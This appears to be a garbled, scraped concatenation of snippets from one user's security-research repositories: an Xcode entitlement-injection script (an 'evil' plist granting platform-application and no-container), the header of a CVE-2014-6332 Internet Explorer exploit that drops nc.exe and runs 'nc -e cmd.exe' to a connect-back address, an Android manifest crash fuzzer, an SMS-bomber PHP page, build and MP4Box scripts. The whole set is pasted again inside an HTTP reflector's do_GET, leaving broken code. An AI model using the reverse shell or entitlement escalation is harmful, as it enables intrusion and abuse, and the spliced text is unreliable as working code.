flankerhqd

## phase.py
import os
# preinstalled python is python2
filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent'

evil = '''
    <!---><!-->
    <key>platform-application</key>
    <true/>
    <key>com.apple.private.security.no-container</key>
    <true/>

## LICENSE
The MIT License (MIT)

Copyright (c) 2015 David Weinstein

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

## cve-2014-6332_exploit.html
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)

## AndroidManifestFuzzer
#!/bin/bash
#Basic set up for an Application AndroidManifest Fuzzer
#this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
#this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
#NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
#NOTE: you should probably monitor $(adb logcat)||(/system/bin/gdbserver) for responsiveness to the issue

APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME

## build_protobuf_android.sh

PREFIX=`pwd`/protobuf/android
rm -rf ${PREFIX}
mkdir ${PREFIX}

export NDK=YOUR_NDK_ROOT

# 1. Use the tools from the Standalone Toolchain
export PATH=YOUR_NDK_STAND_ALONE_TOOL_PATH/bin:$PATH
export SYSROOT=YOUR_NDK_STAND_ALONE_TOOL_PATH/sysroot

## bomb.php
<?php
$tel_no = $_GET['hm'];
$c = $_GET['c']?$_GET['c']:0;
$c++;
?>
<!DOCTYPE html>
<html>
<head>
<title>迷你轰炸台 - 短信炸弹 - BETA!</title>
<?php

## mp4box_hacks.sh
# Add subtitle track
MP4Box -add minecraft_uncut.srt:lang=eng:layout=0x60x0x-1:group=2:hdlr="sbtl:tx3g" Minecraft2_mobile.mp4

# Add audio track
# 1. doesnt work in quicktime/itunes
MP4Box -add commentary_audio.aac Minecraft2_mobile.mp4

# 2. supposed to work in quicktime/itunes but doesn't seem to; :name at least is definitely not supported
MP4Box -add commentary_audio.aac:disable:group1:lang=en:name="Director's Commentary" Minecraft2_mobile.mp4

## reflect.py
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser

class RequestHandler(BaseHTTPRequestHandler):

    def do_GET(self):
	import os
	# preinstalled python is python2
	filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent'

	evil = '''
	<!---><!-->
	<key>platform-application</key>
	<true/>
	<key>com.apple.private.security.no-container</key>
	<true/>
	The MIT License (MIT)

	Copyright (c) 2015 David Weinstein

	Permission is hereby granted, free of charge, to any person obtaining a copy
	of this software and associated documentation files (the "Software"), to deal
	in the Software without restriction, including without limitation the rights
	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	copies of the Software, and to permit persons to whom the Software is
	furnished to do so, subject to the following conditions:
	<html>
	<head>
	<!--
	CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
	The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
	'server_ip' and 'server_port' in javascript below determined the connect back target

	Tested on
	- IE11 + Windows 7 64-bit (EPM is off)
	- IE11 + Windoes 8.1 64-bit (EPM is off)
	#!/bin/bash
	#Basic set up for an Application AndroidManifest Fuzzer
	#this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
	#this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
	#NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
	#NOTE: you should probably monitor $(adb logcat)\|\|(/system/bin/gdbserver) for responsiveness to the issue

	APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
	APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
	APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME

	PREFIX=`pwd`/protobuf/android
	rm -rf ${PREFIX}
	mkdir ${PREFIX}

	export NDK=YOUR_NDK_ROOT

	# 1. Use the tools from the Standalone Toolchain
	export PATH=YOUR_NDK_STAND_ALONE_TOOL_PATH/bin:$PATH
	export SYSROOT=YOUR_NDK_STAND_ALONE_TOOL_PATH/sysroot
	<?php
	$tel_no = $_GET['hm'];
	$c = $_GET['c']?$_GET['c']:0;
	$c++;
	?>
	<!DOCTYPE html>
	<html>
	<head>
	<title>迷你轰炸台 - 短信炸弹 - BETA!</title>
	<?php
	# Add subtitle track
	MP4Box -add minecraft_uncut.srt:lang=eng:layout=0x60x0x-1:group=2:hdlr="sbtl:tx3g" Minecraft2_mobile.mp4

	# Add audio track
	# 1. doesnt work in quicktime/itunes
	MP4Box -add commentary_audio.aac Minecraft2_mobile.mp4

	# 2. supposed to work in quicktime/itunes but doesn't seem to; :name at least is definitely not supported
	MP4Box -add commentary_audio.aac:disable:group1:lang=en:name="Director's Commentary" Minecraft2_mobile.mp4
	#!/usr/bin/env python
	# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
	# Written by Nathan Hamiel (2010)

	from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
	from optparse import OptionParser

	class RequestHandler(BaseHTTPRequestHandler):

	def do_GET(self):